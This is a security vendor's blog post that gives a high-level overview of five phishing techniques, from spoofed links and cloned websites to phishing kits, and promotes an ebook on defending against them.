5 Ways Hackers Execute Successful Phishing Campaigns

Phishing is the oldest trick in the cybercriminal playbook, but it can still be wildly effective at duping unsuspecting victims. Security teams are constantly under fire to defend against phishing attacks, but the truth of the matter is that the majority of cyberattacks that can be attributed to phishing are due to human error. Untrained employees can be tricked into clicking on a malicious email link, fall victim to a malicious redirect, or be fooled by a near-duplicate website run by hackers.

Attackers leverage a variety of tactics to execute phishing attacks against their targets including emails, fake social media pages and personas (known as “social engineering”), instant messaging, texts, and compromised websites. Our new ebook, Gone Phishing: How to Defend Against Persistent Phishing Attempts Targeting Your Organization goes into detail about how threat actors carry out successful phishing attacks, and what security teams can do to prevent them. Keep reading to learn about the six most common phishing techniques cybercriminals use.

1. Link Spoofing or Domain Squatting

Hackers execute link spoofing by making malicious URLs appear to be legitimate, increasing the likelihood of users not noticing the slight difference(s) as they inadvertently click the malicious link. Some of these manipulated links can be easily identified by trained or savvy users who are accustomed to perform a check-before-click procedure. But many users still fall victim to homograph attacks, which take advantage of similar-looking characters, and reduce the efficacy of human-initiated visual inspection and detection. This practice is also known as “domain squatting.”

2. Website Spoofing

Links are not the only items attackers can spoof. Website spoofing is the creation of a replica of a trusted site with the intention of misleading targeted users to a phishing website. Typically, such websites contain legitimate logos, fonts, colors, and similar functionality—making the replicas appear as realistic as possible. Using readily available tools, such as Flash or JavaScript, attackers can control how the URL is displayed to the targeted user. This means that the site may show the legitimate URL even though the user is actually visiting a malicious clone. Cross-Site Scripting (AKA XSS) takes this methodology one step further; XSS attacks exploit vulnerabilities in the legitimate website, allowing attackers to present a real (legitimate) website to unsuspecting users while, behind the scenes, quietly harvesting credentials and other Personally Identifiable Information (PII).

3. Malicious Website Redirects

A malicious redirect is a piece of code that is inserted into a website with the intent of redirecting users to another website and, consequently, harvesting additional personal information in the process. Malicious redirects typically involve a website that is willfully visited by a targeted user, who is then forcibly redirected to an undesired, attacker-controlled website. Attackers accomplish this by compromising a website and inserting their own redirection code, or by discovering an existing bug on the target website that allows a forced redirect through specially crafted URLs, for example.

4. Social Media and Social Engineering Attacks

Phishing takes place across other channels, as well – like social media – adding to the complexity of protecting against phishing. Brand and executive impersonation are common methods cybercriminals use to carry out phishing attacks, oftentimes targeting customers who may lack the awareness and/or security protections that employees have. This type of attack is also known as “social engineering.”

5. Phishing Kits

Hackers offer phishing kits for sale across dark web black markets. These are software programs that essentially templatize the entire process of building a phishing site. With these kits, hackers do not need to have technical skills to run intricate phishing campaigns, so the barrier to entry has been substantially lowered, and the process of weaponizing a phishing campaign is streamlined even for novice hackers.

To learn more about how cybercriminals leverage phishing attacks against enterprises, read our ebook.

Download Your Copy

Stay up to Date!

Subscribe to the blog to stay up to date with all the latest industry news and updates from IntSights.